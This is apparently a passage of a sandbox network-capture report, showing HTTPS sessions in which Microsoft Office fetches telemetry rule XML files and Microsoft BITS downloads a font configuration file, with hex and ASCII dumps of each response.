                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                    X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                    X-OSID: 2
                                                                                                                                                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                                                                                                                                                    X-CCC: GB
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=152058
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:28 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    X-CID: 2


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    30192.168.2.74975213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:29 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:29 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080629Z-174f78459685726chC1EWRsnbg0000000wng000000009nxt
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:29 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    31192.168.2.74975713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:29 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:30 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 428
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080630Z-174f7845968xlwnmhC1EWR0sv80000000wk0000000001xea
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    32192.168.2.74975813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:30 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 499
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080630Z-174f7845968n2hr8hC1EWR9cag0000000wc0000000001gzt
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    33192.168.2.74975913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:30 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3f9ecb84-b01e-0002-696f-401b8f000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080630Z-174f7845968jrjrxhC1EWRmmrs0000000wv0000000002z5h
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    34192.168.2.74976223.218.208.109443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=153134
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:30 GMT
                                                                                                                                                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:30 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    35192.168.2.74975613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:31 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:31 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080631Z-174f7845968xr5c2hC1EWRd0hn0000000dn00000000002ac
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:31 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    36192.168.2.74976313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:31 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:31 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080631Z-174f78459685m244hC1EWRgp2c0000000wm0000000000pu3
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:31 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    37192.168.2.74976413.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:32 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:32 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080632Z-174f7845968j6t2phC1EWRcfe80000000ws00000000092ww
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    38192.168.2.74976613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:32 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:32 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 420
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080632Z-174f7845968kvnqxhC1EWRmf3g0000000fbg00000000b4qs
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
